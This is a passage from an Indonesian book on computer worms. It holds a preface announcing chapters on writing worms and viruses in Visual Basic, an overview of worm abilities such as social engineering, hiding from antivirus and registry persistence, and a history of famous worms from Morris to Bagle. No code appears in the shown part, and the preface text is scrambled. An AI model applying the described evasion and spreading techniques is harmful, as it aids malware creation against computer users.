Penulis berharap buku ini dapat menambah pengetahuan bagi penggemar TI. yaitu: 1. 7. ikut muncul sejumlah worm lokal lainnya seperti diberitakan sebuah situs Indonesia yang konsen terhadap malcode.com. penulis menemukan beberapa posting yang menunjukan adanya gejala-gejala penyebaran worm lokal yang baru. sampai dengan pengrusakan dan pencurian data. system administrator atau siapa saja yang selalu menggunakan komputer. 2. aktifitas worm di Indonesia semakin meningkat. Motif yang digunakan semakin beragam. 6. tapi sebaliknya memberi kesadaran kepada mereka yang senantiasa melakukan hal-hal negatif untuk menghentikan tindakan negatif tersebut. mulai dari hanya sekedar "pamer".Secret of Underground Coding : Uncensored Worm ini kemudian oleh salah satu perusahaan antivirus terkenal diberi nama w32/pesin.vaksin.Computer Worm 1 . bersamaan dengan munculnya varian-varian worm Pesin yang baru. Secara umum buku ini akan membicarakan tujuh hal bidang utama. 5. Buku ini akan menunjukan bagaimana seorang worm writer membuat suatu worm komputer. dan bagaimana memerangi worm tersebut dengan cara yang nyaris sama. penyebaran worm tersebut telah membawa dampak yang cukup besar bagi para pengguna komputer baik materiil maupun non materiil.0 Pemrograman worm komputer Membuat program removal Pemrograman virus komputer Kompresi dengan UPX Bab 1.worm. Mengenal worm komputer Menggunakan registry pada Microsoft Windows Menggunakan Visual Basic 6. Namun satu hal yang pasti. 3. www. Bahkan pada saat buku ini ditulis. Media penyebaran pun semakin canggih mulai dari disket. 4. terbukti dari sejumlah forum. Lebih baik lagi apabila mereka juga memberi kontribusi untuk menghentikan perkembangan worm komputer dan malcode lainnya di bumi pertiwi ini. USB flash disk sampai dengan jaringan termasuk internet.gen. dan bukan untuk mengajari hal-hal negatif kepada para pemula. Pendahuluan Jasakom  .

.Computer Worm 1 ."  Jasakom Bab 1. penulis tak lebih hanya men-download-kannya untuk Anda. Pendahuluan Buku ini juga disertai sebuah CD yang berisi video tutorial untuk menambah pemahaman Anda dalam mempelajari buku ini. script atau program-program yang disertakan bersama buku ini. Selain itu. sesungguhnya sudah tidak dibutuhkan tutorial lain untuk memeranginya. "Dengan mengetahui. worm atau malcode lainnya. mengerti dan menguasai teknik pembuatan suatu virus. Membahas pembuatan suatu worm memerlukan pengertian akan tanggung jawab moral yang besar. penulis tidak bertanggung jawab apabila ada penyalahgunaan atas informasi.Secret of Undeground Coding : Uncensored Perlu Anda ketahui bahwa seluruh software tersebut berlisensi freeware (gratis) dan freetrial (gratis coba) sehingga Anda tidak dikenakan biaya apapun untuk software tersebut kecuali biaya CD dan ongkos pembuatannya. karena worm komputer dapat menimbulkan dampak yang sangat fatal dan merugikan maka penulis sangat mengharapkan kebaikan moral para pembaca. kemudian kumpulan source code yang digunakan sebagai latihan dan beberapa program-program pendukung.

.

Selain itu untuk membuat suatu program removal juga diperlukan pengetahuan tentang worm.Computer Worm 1 .Secret of Undeground Coding : Uncensored BAB  MENGENAL WORM Bab 2. Mengenal Worm Kenapa bab ini ada? Seorang administrator sistem bisa dengan cepat mengetahui apabila suatu worm yang sama menginfeksi sebuah sistem dengan melihat gejala yang ditimbulkan.  Jasakom . dan pengetahuan tersebut bisa berupa teori. sejarah perkembangan atau catatan singkat tentang worm yang pernah ada.

memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata". Program ini akan membantu mengingatkan operator apabila pengendalian suatu pesawat udara berpindah dari satu komputer ke komputer lainnya. Kemudian pada tahun 1960-an. Tetapi program creeper tidak mereproduksi dirinya sendiri. hingga beberapa programmer lain mencoba membuat program serupa. Sesungguhnya program yang disebut "creeper" ini hanya berpindah dari layar ke layar pada jaringan. Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling banyak. dengan menampilkan pesan "I’m creeper! Catch me if you can!". dan mampu bertahan terhadap serangan program lawan lainnya. Mengenal Worm Jasakom  .Secret of Underground Coding : Uncensored . John Von Newman. maka setiap selesai permainan program tersebut selalu dimusnahkan.Computer Worm 1 . Istilah "virus" mungkin sudah tidak asing terdengar. Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada tahun 1971. saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC). Istilah worm ini ternyata diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider". tetapi gagasan tersebut berangsur-angsur hilang dalam beberapa bulan kemudian. padahal istilah ini diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979 sebelum istilah virus komputer dipublikasikan. dapat dikatakan hampir setiap orang yang mengenal komputer juga mengenal istilah ini. Program ini merupakan solusi dari kebutuhan system kendali lalu lintas udara. dibahas suatu kemungkinan bahwa suatu program dapat melakukan penyebaran dengan sendirinya. yang mengisahkan suatu Bab 2. sementara istilah "worm" tidak begitu dikenal. para peneliti AT&T Bell Laboratory membuat semacam permainan dengan menciptakan suatu program yang dapat memusnahkan program ciptaan lawan.1 ASAL MULA WORM KOMPUTER G agasan worm dan virus berawal pada tahun 1949. Para peneliti sadar akan bahaya program tersebut.

Worm ini tidak akan melakukan kegiatan pada siang harinya. seperti worm "town crier" yang bertugas memasuki jaringan hanya untuk menampilkan pengumuman. seperti worm "vampire". Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan mengembangkan lima buah program worm.  Jasakom Bab 2. walaupun program ini berguna tapi disadari bahwa program ini juga akan sangat berbahaya apabila salah digunakan. ini berguna untuk memanfaatkan komputer yang tidak bekerja pada malam hari dengan memberikan tugas yang kompleks dan memerlukan daya proses yang lebih. Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa mematikan jaringan komputer yang secara otomatis juga menghilangkan kendali pemerintah terhadap warga negaranya. Hal ini terbukti saat sebuah worm mengalami malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu kerusakan dimana system output dan input tidak berfungsi). worm akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore berikutnya. Lebih dari itu saat komputer dihidupkan kembali. Walau bagaimanapun. dan mulai saat itu penelitian terhadap worm tersebut ditutup untuk umum.Computer Worm 1 . tetapi saat malam hari worm akan melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya. Pada akhirnya dibuat semacam vaksin untuk mencegah worm tersebut. Mengenal Worm . masing-masing worm dibuat dengan tujuan tertentu yang membantu jaringan disekitarnya. worm malfungsi tersebut kembali membuat komputer crash. Worm lainnya terlihat lebih kompleks dan pintar.Secret of Undeground Coding : Uncensored pemerintahan totaliter yang mengendalikan warga negaranya melalui suatu jaringan komputer. Saat fajar. Beberapa worm terlihat sederhana.

Secret of Underground Coding : Uncensored . juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan. Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector. Bab 2. Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Computer virus: merujuk pada program yang memiliki kemampuan untuk ber. Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi. Trojan horse: merujuk pada program independen yang tampaknya berguna. tanpa sepengetahuan pengguna. menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai suatu file infector. 3. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses cracking atau hacking. dan ketika dieksekusi. Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan. PERBEDAAN WORM DAN VIRUS Istilah "virus" selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer). Worm mampu bekerja Jasakom  . trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer.Computer Worm 1 .reproduksi. seperti worm. menulari program lain dan menjadikan file-file program tertular sebagai file infector. Mengenal Worm 2. 4. berikut adalah beberapa jenis malcode tersebut: 1.

menunggu interaksi user dan menjadikan file terinfeksi sebagai file infector. . USB flash disk maupun melalui suatu jaringan komputer. 2.Secret of Undeground Coding : Uncensored .3. Walaupun memiliki rutin untuk menginfeksi program lain namun tidak bertujuan menjadikan file program terinfeksi menjadi suatu file infector. Berbeda dengan virus yang melakukan infeksi dengan 'menumpang’ pada file program lain. namun seiring dengan perkembangan teknologi informasi hal ini akhirnya banyak ditinggalkan worm writer karena malah akan mengurangi kemampuannya untuk menyembunyikan diri.Computer Worm 1 . Mengenal Worm tanpa interaksi user.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI Yaitu kemampuan yang mutlak dimiliki suatu worm untuk membuat salinan dirinya. yang akan berakibat worm tersebut cepat "terendus" oleh advanced user atau bahkan perusahaan-perusahaan antivirus. KEMAMPUAN DASAR WORM Worm umumnya memiliki kemampuan-kemampuan dasar berikut ini: 2.3.  Jasakom Bab 2.2 KEMAMPUAN REKAYASA SOSIAL Karena file infector worm akan aktif saat user mengeksekusinya maka social engineering atau rekayasa sosial menjadi hal yang sangat penting bagi suatu worm. bisa merusak sebuah data secara langsung atau menurunkan kinerja system dengan "mengikat" sumber daya system komputer dan bahkan bisa mematikan sebuah jaringan. Pada awalnya worm dibuat dengan aksi memenuhi harddisk dan jaringan. sekaligus mendistribusikan salinan tersebut pada system yang lain baik melalui media penyimpanan seperti disket.

Jasakom 10 .3.3. direktori root. bahkan memanipulasi registry milik suatu antivirus agar tidak mengganggu worm tersebut. Suatu worm bisa saja membuat salinan dirinya dengan nama file 'porno’ dan dengan gambar icon yang sangat tidak mencurigakan.Computer Worm 1 . Mengenal Worm 2. menyembunyikan program worm dari taskbar bahkan dari jendela tasklist.3 KEMAMPUAN MENYEMBUNYIKAN DIRI Menjaga tetap tidak diketahui adalah penting untuk worm jaman sekarang agar tetap bertahan pada suatu system.3. 2. Hal ini biasanya dilakukan dengan cara tidak menampilkan sesuatu dari worm baik berupa suara maupun tampilan visual.5 KEMAMPUAN MENGADAKAN MANIPULASI Umumnya manipulasi dilakukan oleh worm untuk bertahan hidup.Secret of Underground Coding : Uncensored Layaknya seorang penjual yang mati-matian merayu calon pembeli maka worm akan 'merias’ programnya dengan icon dan nama yang sangat memikat agar user mengeksekusinya. seperti mengubah volume label pada harddisk atau disket. seperti jenis sistem operasi yang digunakan. Worm cenderung mengadakan manipulasi pada registry agar worm bisa tetap aktif saat komputer dihidupkan.. Bab 2. 2.4 KEMAMPUAN MENDAPATKAN INFORMASI Suatu worm harus bisa mendapatkan informasi yang ia butuhkan. lebih jauh lagi worm akan berusaha mengenali jenis antivirus yang terpasang. direktori System Windows bahkan worm umumnya memeriksa suatu system apakah telah terpasang antivirus atau tidak. Tapi worm bisa saja mengadakan manipulasi yang terlepas dari tujuan tadi.

4. 2. hal ini dipicu oleh metode launcher yang digunakan worm tersebut. Mengenal Worm . semisal: tanggal yang ditentukan.Computer Worm 1 . adapun penyebarannya dapat dilakukan pada system lokal. jaringan atau internet.Secret of Undeground Coding : Uncensored .1 PROPAGATION PHASE ( FASE PENYEBARAN ) Pada fase ini worm akan membuat salinan dirinya ke suatu tempat. 2. Worm akan diaktifkan oleh suatu kondisi tertentu.4 EXECUTION PHASE ( FASE EKSEKUSI ) Pada fase inilah worm yang telah aktif tadi akan melakukan fungsinya.3 TRIGERRING PHASE ( FASE AKTIF ) Di fase ini worm tersebut akan aktif dan menetap pada memory. dan sebagainya. melalui 4 tahap: 2. Seperti menghapus file. kehadiran program lain/dieksekusinya program lain.4.4 SIKLUS HIDUP WORM Siklus hidup worm secara umum.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR ) Pada fase ini worm tidaklah aktif. Tidak semua worm melalui fase ini.4.4. 2. menampilkan pesan-pesan dan sebagainya. 11 Jasakom Bab 2. baik pada media penyimpanan fix disk (tetap) atau removable disk (dapat dipindahkan).

sehingga penerima percaya bahwa e-mail yang dikirimkan tersebut adalah benar dari user yang dikenal dan bersedia membukanya. Dibulan Oktober 1989. dengan mengajak user untuk mengeksekusi worm tersebut dengan dalih akan menampilkan gambar pohon natal. Worm ini Jasakom 1 . tetapi kerusakan yang ditimbulkan disebabkan oleh kecelakaan dan kesalahan pemrograman. Kemudian diadakan penyelidikan. Worm ini juga menjadi contoh penggunaan social engineering. Robert Morris Jr. tetapi worm tersebut juga mengirimkan salinan dirinya dengan menggunakan nama user kepada setiap nama yang ada pada daftar e-mail penerima.5.Computer Worm 1 . muncul sebuah worm bernama WANK (Worms Against Nuclear Killers) yang tampaknya belajar dari worm Morris dan melakukan penularan pada komputer VMS pada DECNet.Secret of Underground Coding : Uncensored .000 komputer dalam beberapa jam. worm Morris yang terkenal pada waktu itu berhasil melumpuhkan 6. 2. PERKEMBANGAN WORM NON LOKAL Berikut ini beberapa catatan singkat tentang worm yang pernah ada dan membuat banyak kerugian para pengguna komputer. worm "Christma Exec" menjadi worm pertama yang mampu menyebar dengan menggunakan media e-mail diantara komputer mainframe IBM. Kesimpulan yang diperoleh adalah motivasi dalam menulis worm tersebut tidak diketahui dan worm tidak diprogram untuk sengaja melakukan pengrusakan.5. Bab 2.2 MORRIS Pada tanggal 2 Nopember 1988.1 CHRISTMA EXEC Pada tanggal 9 Desember 1987. Worm tersebut memang menghasilkan gambar pohon natal pada layar monitor (digambar dengan menggunakan bahasa script yang disebut Rexx). Worm tersebut dibuat oleh seorang siswa Cornell. sampai akhirnya Morris dijatuhkan hukuman pada tahun 1990. Mengenal Worm 2.

DLL yang asli diubah kembali namanya menjadi WSOCK32. Pertama kali yang dilakukannya adalah melakukan pemeriksaan apakah versi aplikasi Word yang digunakan bisa diinfeksi. Ironisnya saat itu masih banyak yang percaya bahwa dengan membuka sebuah e-mail tidak dapat menginfeksi sebuah komputer.5. Mengenal Worm 2.000 unit komputer hanya dalam waktu tiga hari.Secret of Undeground Coding : Uncensored menyebar dengan memanfaatkan e-mail dan mengeksploitasi system untuk mendapatkan hak akses dengan berusaha mencari account user name dan password. tetapi secara diam-diam memodifikasi file WSOCK32. Mellisa menyertakan sebuah file attachment berupa file dokumen Word yang terinfeksi.sex" yang menjanjikan account name berikut password untuk dapat mengakses sebuah situs erotis. Ketika file tersebut dieksekusi tampil gambar kembang api untuk memperingati tahun baru 1999. Pada bulan Januari 1999.Computer Worm 1 .exe. sebuah virus macro "Melisa" kembali meresahkan pengguna internet dengan menginfeksi 100. Virus tersebut memulai penyebarannya dengan pengiriman perdana ke Usenet Newsgroup "alt.DLL (file system untuk koneksi internet) dengan suatu program trojan horse yang mengijinkan worm tersebut menyisipkan dirinya pada proses komunikasi internet.4 MELISA Di bulan Maret 1999. sementara file WSOCK32. 1 Jasakom Bab 2. Sebuah perusahaan antivirus Norton menyebutkan bahwa virus ini adalah penggabungan antara worm dan virus.5. worm happy99 menyebar lewat e-mail dengan attachment sebuah file aplikasi bernama happy99.SKA 2. yang akan mencurigakan user.3 HAPPY99 . jika bisa maka virus akan mengurangi pengaturan keamanan pada aplikasi Word untuk mencegah aplikasi menampilkan pesan atau peringatan tentang adanya suatu macro. Ketika macro tersebut tereksekusi oleh aplikasi Word.

Bab 2. apabila key tersebut tidak ditemukan. yang merupakan sebuah karakter pada suatu pertunjukan televisi "South Park". virus akan mengeksekusi aplikasi Outlook dan berusaha mengirimkan salinan dirinya kepada 50 penerima yang ada pada address book (buku alamat) aplikasi Outlook.Secret of Underground Coding : Uncensored Virus kemudian mencari sebuah key pada registry yang mengandung kata "kwyjibo". worm menginstal dirinya ke direktori System Windows dan memodifikasi registry yang membuat worm tersebut aktif saat file ber-ekstensi "exe" apa saja dieksekusi. muncul sebuah worm bernama "ExploreZip" yang menyamar sebagai file zip (file terkompresi) dalam attachment sebuah e-mail yang jika dieksekusi akan menampilkan pesan kesalahan. ExploreZip secara diam-diam menyalin dirinya kedalam direktori System Windows dan memodifikasi registry. Mengenal Worm 2. hanya saja file tersebut menggunakan icon bergambar seekor beruang. Jasakom 14 .6 EXPLORE ZIP Pada bulan Juni tahun 1999. Worm juga mengirimkan salinan dirinya pada alamat e-mail yang ada pada buku alamat Windows. terakhir dilaporkan bahwa worm ini memasang suatu backdoor.exe". Worm yang dinamakan "PrettyPark" ini menyertakan attachment berupa file "Pretty Park. Sebagai tambahan virus menulari file template aplikasi Word "normal. 2.5 PRETTY PARK Sebuah worm lainnya menyebar luas dimusim panas tahun 1999. Tidak ada penjelasan pada attachment.dot" menggunakan fitur VBA macro "Auto Execute". Pretty Park kemudian berusaha mengirimkan beberapa data system dan password pada sebuah server IRC (internet relay chat) tertentu. yang tentunya juga ber-ekstensi "exe". Jika dieksekusi.5.Computer Worm 1 . Hal ini menjadi permasalahan bagi program antivirus.5. file dokumen yang berasal dari file template tersebut akan membawa serta virus tersebut.

Salah satu metode penyebarannya menggunakan e-mail yang memiliki attachment berupa file ZIPPED_FILES.Computer Worm 1 . tanpa harus membuka pesannya. sehingga apabila komputer dihidupkan virus akan berusaha mengirimkan dirinya pada setiap alamat yang ada pada address book aplikasi Outlook. H (Header C) sehingga file-file tersebut sulit untuk diselamatkan. Varian ini bernama ExploreZip. Bab 2. Virus akan datang sebagai sebuah e-mail dengan subjek "BubbleBoy is back". dengan mengawasi e-mail yang masuk dan membalas e-mail tersebut dengan salinan dirinya. File tersebut akan ditambahkan pada direktori StartUp Windows. CPP (C++).5. ASM (Assembler). XLS (Microsoft Excel). ExploreZip juga melakukan penyebaran lewat e-mail dengan memanfaatkan aplikasi Outlook atau Exchange. pesan berbentuk file HTML dan mengandung script virus dalam bahasa Visual Basic. C (File C). PPT (Microsoft Powerpoint).7 BUBBLE BOY Awal tahun 2000. worm "KAK" tersebar dengan cara yang serupa.EXE saat file ini dieksekusi maka worm menginstal dirinya sendiri pada system Windows. muncul sebuah virus yang membawa sebuah konsep baru "BubbleBoy". Worm ini meng-overwrite (menimpa) file dokumen dengan ekstensi DOC (Microsoft Word).N varian dan cukup merepotkan pengguna komputer di Indonesia. Virus ini menunjukkan bahwa sebuah komputer dapat tertular hanya dengan melihat e-mail. Jika menggunakan aplikasi Outlook. 2. Virus ini mengambil keuntungan dengan adanya celah keamanan pada aplikasi Internet Explorer. Mengenal Worm pada tanggal 9 Januari 2003 ExploreZip kemudian dilaporkan menghasilkan varian baru. 1 Jasakom . yang secara otomatis mengeksekusi script Visual Basic yang terdapat pada body e-mail.Secret of Undeground Coding : Uncensored Seperti worm lainnya. Diwaktu yang hampir bersamaan. script tersebut akan dijalankan walaupun yang dilakukan hanya preview.

Untuk setiap e-mail yang terkirim worm akan mengirimkan salinan dirinya ke alamat penerima yang sama. Bab 2. Jika dieksekusi akan memodifikasi file WSOCK32. bisa men-download file update untuk dirinya sendiri dari newsgroup "alt.Computer Worm 1 . comp.5. maka worm akan mengirimkan salinannya pada siapa saja yang ada pada address book aplikasi Outlook. Windows2000. Sebagai tambahan worm akan membuat koneksi IRC dan mengirimkan salinan dirinya pada siapa saja yang bergabung pada saluran IRC tersebut. Mengenal Worm 2. dan jika aplikasi Outlook terinstal pada komputer tersebut. Ketika komputer lainnya terinfeksi. LoveLetter juga memiliki kemampuan untuk mencuri password. Ketika dieksekusi. File attachment berupa Visual Basic Script yang bisa dieksekusi dengan Windows Script Host (bagian dari Windows98. Dengan mengubah home page (alamat url yang akan diakses pertama kalinya) pada Internet Explorer ke suatu website di Asia. worm akan mengusahakan agar suatu trojan horse di download dari website tersebut.virus" metode yang digunakan termasuk canggih dan sangat berbahaya karena payload worm tersebut bisa diubah kapan saja. yang hingga saat ini sudah menjadi suatu kebiasaan suatu worm dalam penyebarannya. Jasakom 1 . E-mail yang berisi worm ini memiliki subjek "I Love You" yang berarti "Saya Cinta Kamu" dan berisi pesan-pesan yang mendorong user untuk mengeksekusi attachment yang merupakan worm tersebut.9 HYBRIS Dibulan Oktober 2000. Yang menarik dari worm ini yaitu.Secret of Underground Coding : Uncensored 2.5.8 LOVE LETTER Dibulan Mei 2000.DLL dalam rangka menjejaki semua lalu lintas ber-internet. lajunya penyebaran worm "LoveLetter" menunjukkan efektifitas serangan dengan metode social engineering. atau Outlook 5). dimana trojan horse tersebut akan mengumpulkan password e-mail dan mengirimkannya ke suatu alamat di Asia. worm Hybris menyebar dengan e-mail berattachment. LoveLetter menginstal dirinya kedalam direktori System Windows dan memodifikasi registry untuk memastikan bahwa worm akan aktif saat komputer dihidupkan. Internet Explorer 5.

2. worm Sadmind menyebar dengan mentargetkan 2 vulnerability (kelemahan) pada 2 sistem operasi yang berbeda. Vulnerability ini kemudian diumumkan pada tanggal 18 Juni 2001.Computer Worm 1 . kemudian melakukan pemeriksaan sistem operasi pada IP yang berhasil disusunJika worm menemukan sebuah IP target menggunakan sistem operasi 1 Jasakom Bab 2. Worm ini dibawa dalam suatu attachment e-mail yang menyatakan bahwa lampiran tersebut adalah file gambar dalam bentuk file jpg yang memuat foto pemain tenis tersebut.Secret of Undeground Coding : Uncensored 2.5.11 SADMIND Pada bulan Mei 2001. membaca IP system dan dari IP tersebut worm menyusun 99 IP baru. Pertama kali yang dilakukannya adalah meng-eksploitasi vulnerability buffer overflow pada sistem operasi Sun Solaris. Apabila file tersebut dieksekusi maka akan mengirimkan salinan dirinya kepada setiap nama yang terdaftar pada buku alamat Microsoft Outlook. dan menjadi teladan untuk worm berikutnya yang bisa melakukan serangan dengan berbagai kombinasi. dengan aksi mengubah tampilan awal website pada server yang tertular. dan menginstal suatu program agar bisa melakukan komunikasi dengan IIS webserver guna melakukan suatu serangan. yang memanfaatkan kepopuleran seorang petenis asal Rusia "Anna Kournikova".5.5. Mengenal Worm . kembali sebuah worm mencemaskan para pengguna internet. Pertama kali worm menginstal dirinya pada system. 2. yang menunjuk sebagai vulnerability pada Index Server ISAPI.10 ANNA KOURNIKOVA Pada bulan Februari 2001.12 CODE RED Memanfaatkan vulnerability pada Index Server ISAPI tersebut. pada tanggal 12 Juli 2001 muncul sebuah worm dengan nama "Code Red" yang menyerang semua IIS webserver.

worm.000 unit komputer.000 unit komputer hanya dalam waktu 14 jam. muncul Code Red I yang merupakan versi kedua dari worm Code Red dengan penyebaran yang lebih cepat.exe" dan ditempatkan pada direktori root.2 juta komputer serta menyebabkan kerugian sebesar US $ 370 juta.Computer Worm 1 . Tidak begitu lama pada tanggal 19 Juli 2001.5. dan dalam dua hari Nimda berhasil menginfeksi 2.exe". muncul dengan memuat payload yang sangat berbahaya dan menggunakan beragam cara dalam penyebarannya. Di bulan Agustus 2001. menunjukkan adanya tingkatan baru atas kompleksitas yang tidak terlihat sebelumnya." Berikutnya worm mencari file c:\notworm. Worm ini masih memanfaatkan vulnerability yang sama dengan versi sebelumnya. Worm tidak akan menghentikan serangannya jika file tersebut tidak ditemukan. Banyak perbaikan pada program worm sehingga mampu menginfeksi 359. Walaupun worm ini tidak menggunakan metode baru dalam penyebarannya. sedikit perubahan pada program. Mengenal Worm 2. Pada tanggal 20 Juli worm akan melakukan serangan DOS (denial of service) pada server www.Secret of Underground Coding : Uncensored Microsoft Windows maka worm akan meng-eksploitasi server target tersebut. seperti versi pertama worm ini juga membuat dirinya dalam kondisi dormant pada tanggal 20 Juli secara permanen.whitehouse. muncul dengan payload yang sangat berbahaya. Nimda melakukan penyebaran dengan mengirimkan salinan dirinya melalui e-mail dengan subjek random (acak) dan sebuah file attachment "readme. dan melakukan deface (mengubah halaman awal suatu website) dengan tampilan "Welcome to the www. Jasakom 1 .gov.13 NIMDA Tanggal 18 September 2001. worm ini akan membuat suatu trojan "explorer. kemudian pada tanggal 27 worm membuat dirinya dalam kondisi dormant (fase saat worm menjadi tidak aktif) secara permanen. tetapi dengan penggabungan beberapa metode dalam suatu worm. kembali Code Red muncul dengan versi berbeda "Code Red II". Bab 2.com ! hacked by Chinese!. pada 12 jam pertama saja worm ini sudah berhasil menginfeksi 450. worm Nimda adalah worm yang termasuk paling banyak menginfeksi komputer di Indonesia.

Bab 2.Computer Worm 1 .Secret of Undeground Coding : Uncensored Nimda memanfaatkan celah keamanan pada Internet Explorer dan Outlook Express 5. BadTrans.5 Service Pack 1.01 dan 5. Pada server yang terinfeksi. Seperti Nimda.B memeriksa direktori inbox pada aplikasi Outlook dengan mencari e-mail yang belum dibuka oleh user. kemudian membalas e-mail tersebut dengan file attachment berupa salinan dirinya sendiri. Dalam penyebarannya. Mengenal Worm Bila komputer terinfeksi berada dalam suatu jaringan maka secara otomatis Nimda mencari direktori yang di sharing dari komputer lain dan memberikan hak tulis penuh (full access) kemudian membuat salinan dirinya ke dalam direktori-direktori tersebut.B menambahkan underscore (tanda garis bawah) "_" disetiap awal alamat pengirim. 1 Jasakom . e-mail yang dikirimkan berupa halaman html dan secara otomatis mengaktifkan file attachment walaupun e-mail tersebut hanya dilihat pada preview pane saja. dilaporkan worm ini mengakibatkan kerugian sebesar US $ 210 juta.B akan menginstal suatu program trojan yang akan mencuri user name dan password kemudian mengirimkannya pada suatu alamat e-mail tertentu. BadTrans kembali beraksi setelah kemunculan perdananya pada tanggal 12 April 2001 dengan teknik yang lebih canggih dan bisa dikatakan sebagai era baru dalam social engineering. 2. Pada proses pengiriman e-mail BadTrans. sehingga apabila e-mail tersebut di-reply (balas) maka e-mail balasan tersebut tidak akan sampai pada alamatnya.B Pada bulan November 2001.eml saat halaman web tersebut dibuka. dengan mengambil nama file secara random pada daftar file yang ada pada komputer terinfeksi. dengan menggunakan ekstensi EML atau NWS.5.14 BADTRANS. BadTrans. Nimda juga memanfaatkan backdoor pada server yang terinfeksi CodeRed2 atau Sadmind. dimana e-mail yang dikirimkan Nimda berupa halaman html yang memiliki body script tertentu dengan tujuan akan secara otomatis mengaktifkan file attachment walaupun e-mail tersebut hanya dilihat pada preview pane saja. file-file halaman web akan disisipkan script baru yang secara otomatis mengakses file readme. Banyaknya perubahan pada file system dan registry membuat worm ini sulit untuk dibersihkan.

Klez menyatukan suatu keunikan dengan pendekatan sosial yang inovatif. Klez merupakan salah satu worm yang memiliki siklus hidup terpanjang. dan mendominasi pada tahun 2002 sebagai worm yang paling lazim di internet. Pertama kali dilaporkan pada bulan Oktober 2001. dimana ??? adalah variabel random berupa angka 2 dan 3. Dengan cara ini terlihat. kemudian mengirimkan salinan dirinya ke seluruh alamat e-mail yang lain. Mengenal Worm Jasakom 0 .EXE".Computer Worm 1 . Klez hanya menggunakan sarana e-mail dalam penyebarannya. Sircam dan Fun Love. yang pernah mengacaukan dunia internet. Tanggal 11 Nopember 2001. Pada varian selanjutnya. Bab 2. d worm ini juga memodifikasi registry dengan alasan yang sama. dengan memilih salah satu alamat e-mail yang ada pada komputer terinfeksi dan menggunakan alamat tersebut sebagai alamat pengirim. Saat dieksekusi worm akan menginstal dirinya kedalam direktori System Windows dengan nama file "WINK???. seperti worm lainnya worm ini pun menggunakan kelemahan IE dan OE sehingga worm tereksekusi dengan sendirinya walau hanya dilihat pada preview pane saja. Code Red.5. Selain itu worm ini juga telah dipersenjatai dengan pembunuh program antivirus yang bisa mendeteksi Nimda.15 KLEZ Worm Klez muncul di bulan Oktober 2001. dan saat attachment tersebut dieksekusi maka sebenarnya user malah menginstal Klez serta virus ElKern pada komputer mereka. seolah-olah e-mail dikirim oleh seseorang yang benar-benar dikenal oleh penerima. Saat dieksekusi worm menginstal dirinya kedalam direktori System Windows dengan nama file "WinSvc.exe" dan melakukan modifikasi pada registry sehingga worm akan aktif saat komputer dihidupkan. dengan mengikuti petunjuk tersebut.Secret of Underground Coding : Uncensored 2. Klez.d memiliki rutin baru yang akan memeriksa database alamat e-mail dari pengguna ICQ sebagai target pengiriman. e-mail tidak hanya terlihat berasal dari seorang teman tetapi klez menyisipkan sebuah tool "imunitas" sebagai attachment dan penerima diajarkan untuk menon-aktifkan antivirus mereka agar bisa menjalankan tool tersebut. Varian lainnya muncul dengan nama Klez. Seperti Klez. dilaporkan kembali varian lain dari worm tersebut.e dan dilaporkan pada tanggal 17 Januari 2002.

Secret of Undeground Coding : Uncensored Akhir tahun 2003 kembali dilaporkan varian Klez. Cara kerja worm ini hampir sama dengan CodeRed. Slammer memanfaatkan vulnerability yang ditemukan oleh Next Generation Security Software Limited pada bulan Juli 2002 dimana dengan memanfaatkan vulnerability ini. kemudian memanipulasi registry agar worm tereksekusi setiap kali Windows startup. penyerang dapat menguasai SQL Server dan kode pemrograman yang berhasil dimasukkan akan berjalan sebagai system karena hak dari MS SQL Server di dalam komputer adalah system. dan melakukan penyebaran dengan cara mengirimkan file infector melalui e-mail ber-attachment.Computer Worm 1 . 2.17 BAGLE Di minggu ketiga Januari 2004.5. htm.5.16 SLAMMER Serangan worm Slammer dimulai pada tanggal 23 Januari 2003. dengan tujuan pengiriman yang dikoleksi dari file-file berekstensi txt. tetapi diperkirakan Klez dan varian-nya menimbulkan kerugian sebesar US $ 9 milyar. 1 Jasakom Bab 2. walaupun sukar menentukan besar kerugian yang ditimbulkan. Saat file infector dieksekusi. Mengenal Worm . dan tidak memodifikasi registry. html dan wab pada sistem lokal. 2. Worm yang kemudian diketahui bernama Bagle ini memiliki siklus hidup yang tergolong singkat.H sebagai ancaman. sebuah worm yang disinyalir berasal dari Jerman ternyata sukses meraih peringkat pertama sebagai worm yang paling banyak dihentikan. worm yang hanya berukuran 369 byte ini menjadikan Slammer sebagai worm dengan ukuran terkecil yang pernah ada. Worm ini bukan merupakan mass mailer dan hanya menyebarkan dirinya melalui scanning port 1434. Bagle memasuki fase dormant secara permanen pada tanggal 28 Januari 2004 dan berusaha untuk menghapus file launcher-nya. Bagle membuat salinan file worm pada direktori System Windows. Bagle memiliki ukuran file sebesar 15 Kb.

